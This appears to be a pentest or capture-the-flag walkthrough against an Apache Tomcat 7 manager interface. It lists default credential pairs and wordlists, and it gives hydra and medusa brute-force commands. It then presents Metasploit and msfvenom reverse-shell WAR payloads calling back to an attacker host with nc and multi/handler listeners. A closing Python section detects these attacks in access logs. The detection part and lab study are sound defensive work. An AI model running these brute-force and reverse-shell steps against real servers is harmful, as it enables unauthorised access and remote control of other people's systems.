Apache Tomcat/7.0.88

  • http://$IP:8080/manager/status
  • http://$IP:8080/manager/html
  • http://$IP:8080/host-manager/html

User     Pass
admin    password
admin    (blank)
admin    Password1
admin    password1
admin    admin
admin    tomcat
both     tomcat
manager  manager
role1    role1
role1    tomcat
role     changethis
root     Password1
root     changethis
root     password
root     password1
root     r00t
root     root
root     toor
tomcat   tomcat
tomcat   s3cret
tomcat   password1
tomcat   password
tomcat   (blank)
tomcat   admin
tomcat   changethis

Reconnaissance

ping

ping -c 1 $IP
64 bytes from 10.10.10.95: icmp_seq=1 ttl=127 time=46.8 ms

nmap

nmap -p 8080 -Pn -sC -sV $IP

Enumeration

user.txt

admin
both
manager
role
role1
root
tomcat

pass.txt

password
admin
changethis
manager
password
password1
Password1
r00t
role1
root
s3cret
tomcat
toor

medusa - /manager/status

medusa -h $IP -n 8080 -U user.txt -P pass.txt -M http -m DIR:/manager/status -T 10

hydra - /manager/status

hydra -L user.txt -P pass.txt -s 8080 -f $IP http-get /manager/status

medusa - /manager/html

medusa -h $IP -n 8080 -U user.txt -P pass.txt -M http -m DIR:/manager/html -T 10

hydra - /manager/html

hydra -L user.txt -P pass.txt -s 8080 -f $IP http-get /manager/html

medusa - /host-manager/html

medusa -h $IP -n 8080 -U user.txt -P pass.txt -M http -m DIR:/host-manager/html -T 10

hydra - /host-manager/html

hydra -L user.txt -P pass.txt -s 8080 -f $IP http-get /host-manager/html

Exploitation

  • https://www.exploit-db.com/exploits/31433
  • https://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_upload/
  • https://www.revshells.com/

exploit 1 - metasploit

use exploit/multi/http/tomcat_mgr_upload
set RHOST 10.10.10.95
set RPORT 8080
set LHOST 10.10.14.16
set LPORT 4444
set HttpUsername tomcat
set HttpPassword s3cret
options
run

exploit 2 - shell.war

payload

msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f war -o shell.war

listener

nc -lvnp 4444

exploit 3 - shell.war

payload

msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f war -o shell2.war

listener

msfconsole -q -x "use multi/handler; set payload java/meterpreter/reverse_tcp; set lhost 10.10.14.16; set lport 4444; exploit"
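
Detection

Seen from the server side, the credential guessing against the manager paths and the WAR upload that follows leave a recognisable trail in Tomcat's access log. The Python below is an added example, not part of the original notes, that flags that trail. It assumes the AccessLogValve "common" pattern, the HTML manager's /manager/html/upload action, a threshold of 5 failed logins per client, and constructed sample log lines.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+$')
MANAGER = ("/manager/", "/host-manager/")   # the paths listed on this page
UPLOAD = "/manager/html/upload"             # assumed: HTML manager WAR upload action
THRESHOLD = 5                               # assumed: 401s per client before reporting

def analyse(lines, threshold=THRESHOLD):
    """Return (client, finding, detail) tuples in log order."""
    failures, flagged, findings = defaultdict(int), set(), []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue
        client, user, method, path, status = m.groups()
        if not path.startswith(MANAGER):
            continue
        if status == "401":
            failures[client] += 1
            if failures[client] == threshold:
                flagged.add(client)
                findings.append((client, "bruteforce", f"{threshold} failed logins"))
        elif status.startswith("2") and user != "-":
            if client in flagged:            # success right after a burst of 401s
                flagged.discard(client)
                failures[client] = 0
                findings.append((client, "guessed-credentials", user))
            if method == "POST" and path.startswith(UPLOAD):
                findings.append((client, "war-upload", user))
    return findings

# Constructed sample log (not captured from a real server).
T = "[01/Jan/2024:10:00:00 +0000]"
SAMPLE_LOG = (
    [f'10.10.14.16 - - {T} "GET /manager/html HTTP/1.1" 401 2473'] * 6
    + [f'10.10.14.16 - tomcat {T} "GET /manager/html HTTP/1.1" 200 19690',
       f'10.10.14.16 - tomcat {T} "POST {UPLOAD}?org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 200 21004',
       f'192.0.2.10 - - {T} "GET /manager/html HTTP/1.1" 401 2473',
       f'192.0.2.10 - admin {T} "GET /manager/status HTTP/1.1" 200 4521',
       f'192.0.2.10 - - {T} "GET /index.jsp HTTP/1.1" 200 11418']
)

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(*finding, sep="\t")
```

A single 401 followed by a 200 is what a browser's normal basic-auth prompt produces, which is why the second client in the sample is not reported.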